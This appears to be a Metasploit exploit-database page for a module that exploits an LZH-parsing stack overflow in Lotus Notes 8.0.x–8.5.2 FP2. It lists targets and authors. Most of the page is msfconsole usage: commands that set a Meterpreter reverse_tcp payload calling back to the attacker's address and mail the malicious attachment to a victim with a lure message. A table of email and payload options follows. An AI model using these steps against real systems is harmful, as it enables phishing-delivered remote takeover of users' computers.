Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) | Metasploit Exploit Database (DB)

Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)

This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net

Search Other Modules


Exploit Rank

  • Normal

Exploit Authors

  • binaryhouse.net < >
  • alino < 26alino [at] gmail.com >

Vulnerability References


Exploit Targets

  • 0 - Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal (default)
  • 1 - Lotus Notes 8.5.2 FP2 / Windows Universal / DEP

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/lotus/lotusnotes_lzh
msf exploit(lotusnotes_lzh) > show payloads
msf exploit(lotusnotes_lzh) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(lotusnotes_lzh) > set LHOST [MY IP ADDRESS]
msf exploit(lotusnotes_lzh) > set MAILTO [STRING]
msf exploit(lotusnotes_lzh) > set RHOST [TARGET IP]
msf exploit(lotusnotes_lzh) > set SUBJECT [STRING]
msf exploit(lotusnotes_lzh) > exploit


Exploit Module Options

FILENAME Sets the attachment file name (default: data.lzh)
MAILFROM The FROM address of the e-mail (default: random@example.com)
MAILTO The TO address of the email
MESSAGE Email message text (default: Important message, please view attachment!)
PASSWORD SMTP Password for sending email
RHOST The SMTP server to send through
RPORT The SMTP server port (e.g. 25, 465, 587, 2525) (default: 25)
SUBJECT Subject line of the email
USERNAME SMTP Username for sending email
VERBOSE Display verbose information
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
DynamicSehRecord Generate a dynamic SEH record (more stealthy)
EnableContextEncoding Use transient context when encoding payloads
ExitOnSession Return from the exploit after a session has been created
ListenerTimeout The maximum number of seconds to wait for new sessions
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE Specify the workspace for this module
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)